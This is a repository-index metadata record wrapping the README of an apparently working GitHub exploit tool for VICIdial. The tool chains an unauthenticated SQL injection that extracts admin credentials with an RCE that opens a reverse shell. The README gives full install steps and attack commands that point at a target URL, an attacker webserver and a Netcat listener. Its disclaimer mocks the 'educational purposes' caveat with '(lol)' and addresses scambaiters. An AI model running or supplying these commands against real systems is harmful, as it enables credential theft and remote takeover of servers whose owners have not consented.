{"id":22799787,"url":"https://github.com/chocapikk/cve-2024-8504","last_synced_at":"2025-08-05T02:33:22.189Z","repository":{"id":257071414,"uuid":"857247047","full_name":"Chocapikk/CVE-2024-8504","owner":"Chocapikk","description":"VICIdial Unauthenticated SQLi to RCE Exploit (CVE-2024-8503 and CVE-2024-8504)","archived":false,"fork":false,"pushed_at":"2024-09-15T21:34:35.000Z","size":111,"stargazers_count":39,"open_issues_count":1,"forks_count":5,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-04-19T19:09:25.360Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Chocapikk.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2024-09-14T06:27:11.000Z","updated_at":"2025-03-23T19:38:37.000Z","dependencies_parsed_at":null,"dependency_job_id":"90092ea1-1cdb-4a99-8af1-3c4d94c7bb1e","html_url":"https://github.com/Chocapikk/CVE-2024-8504","commit_stats":null,"previous_names":["chocapikk/cve-2024-8504"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Chocapikk/CVE-2024-8504","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-8504","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-8504/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-8504/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-8504/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Chocapikk","download_url":"https://codeload.github.com/Chocapikk/CVE-2024-8504/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Chocapikk%2FCVE-2024-8504/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":268823402,"owners_count":24313043,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-05T02:00:12.334Z","response_time":2576,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-12T07:09:58.363Z","updated_at":"2025-08-05T02:33:22.174Z","avatar_url":"https://github.com/Chocapikk.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# ⚡️ Exploit for CVE-2024-8504 \u0026 CVE-2024-8503: SQLi and RCE ⚡️\n\n![Banner](./img/banner.png)\n## 🚨 Overview\n\nThis repository contains a combined exploit for two critical vulnerabilities discovered in **[VICIdial](https://vicidial.com)** by **[KoreLogic](https://korelogic.com)**:\n- **CVE-2024-8503**: Unauthenticated SQL Injection (SQLi)\n- **CVE-2024-8504**: Authenticated Remote Code Execution (RCE)\n\nThese vulnerabilities allow an attacker to retrieve administrative credentials through SQLi and ultimately execute arbitrary code on the target server via an RCE attack.\n\n### 🛑 Advisory:\n\n- **Vulnerability Type**: SQL Injection (CVE-2024-8503) and RCE (CVE-2024-8504)\n- **Affected Software**: VICIdial\n- **Severity**: Critical\n- **CVE IDs**: \n  - **CVE-2024-8503** (SQLi)\n  - **CVE-2024-8504** (RCE)\n\n### 🔗 Vulnerability Advisories:\n- [CVE-2024-8503 - SQLi Advisory](https://korelogic.com/Resources/Advisories/KL-001-2024-011.txt)\n- [CVE-2024-8504 - RCE Advisory](https://korelogic.com/Resources/Advisories/KL-001-2024-012.txt)\n\n## ⚙️ Features\n\nThis exploit tool allows you to either:\n1. **Retrieve administrator credentials via SQLi** (CVE-2024-8503)\n2. **Achieve RCE via poisoned recording files** (CVE-2024-8504)\n\nThe tool is based on KoreLogic’s original research, with enhancements made to:\n- Separate the **SQLi** and **RCE** functionalities for more flexibility.\n- Improve the **user experience** by simplifying execution and error handling.\n- Provide a cleaner and more **aesthetic output** using `rich_click`.\n\n## 📜 Requirements\n\nTo use this exploit, you need:\n- Python 3.10+\n- A **server** where you can open TWO ports \n- A target server running a vulnerable **VICIdial** instance\n- Dependencies installed via `requirements.txt`\n\n## ⚙️ Installation\n\n1. Clone the repository:\n\n```bash\ngit clone https://github.com/Chocapikk/CVE-2024-8504\ncd CVE-2024-8504\n```\n\n2. Install the dependencies:\n\n```bash\npip install -r requirements.txt\n```\n\n## 🛠️ Usage\n\n### SQLi Mode (Retrieve Admin Credentials)\n\nTo perform only the **SQL Injection** attack and retrieve the administrative credentials, use the following command:\n\n```bash\npython exploit.py -u https://example.org\n```\n\n### RCE Mode (Remote Code Execution)\n\nOnce you have the administrator credentials, or if you already know them, you can launch a full RCE attack by running the following command:\n\n```bash\npython exploit.py -b -u https://example.org \\\n            -wh \u003cwebserver IP\u003e -wp \u003cwebserver port\u003e \\\n            -lh \u003cyour IP\u003e -lp \u003cyour listener port\u003e  \\\n            -un \u003cadmin username\u003e -pw \u003cadmin password\u003e\n```\n\nThe `-b` option binds the reverse shell to your listener IP and port. This command will start a **Netcat** listener on the specified port and wait for an incoming reverse shell.\n\n\u003e ⚠️ Replace `\u003cwebserver IP\u003e` and `\u003cwebserver port\u003e` with the values of your malicious webserver (where you execute the exploit) used to capture the reverse shell or inject payloads.\n\n## 🌐 Usage Example with a server\n\nIt’s recommended to use a server where you can open ports to listen for reverse shells. Below are examples for both SQLi and RCE:\n\n### Example for SQLi:\n\n```bash\npython exploit.py -u https://example.org\n```\n\n### Example for RCE:\n\n```bash\npython exploit.py -u https://example.org -wh \u003cserver IP\u003e -wp 5000 -lh \u003cserver IP\u003e -lp 1337 -un admin -pw password123 -b\n```\n\n## ✨ Improvements\n\n- **Separation of vulnerabilities**: The tool clearly separates the execution of the **SQLi** and **RCE** functionalities, making it more flexible for different exploitation scenarios.\n- **Cleaner output**: The output is more structured and easy to read, highlighting key steps and results.\n- **Bug fixes**: Some bugs from the original exploit have been fixed to ensure smoother execution.\n\n## 📄 Acknowledgements\n\nThis exploit is based on the original work by **[KoreLogic](https://korelogic.com)**, and full credit goes to them for the discovery and initial PoC:\n- [CVE-2024-8503 - SQLi Advisory](https://korelogic.com/Resources/Advisories/KL-001-2024-011.txt)\n- [CVE-2024-8504 - RCE Advisory](https://korelogic.com/Resources/Advisories/KL-001-2024-012.txt)\n\nSpecial thanks to KoreLogic for the foundational work. This tool was adapted to improve ease of use, bug fixes, and better separation between the two vulnerabilities.\n\n## 🛡️ Disclaimer\n\nThis tool is for **educational purposes** only (lol). Use of this exploit without explicit permission from the system owner is illegal. The author assumes no responsibility for the misuse of this tool. Scambaiters, you're welcome.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchocapikk%2Fcve-2024-8504","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fchocapikk%2Fcve-2024-8504","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchocapikk%2Fcve-2024-8504/lists"}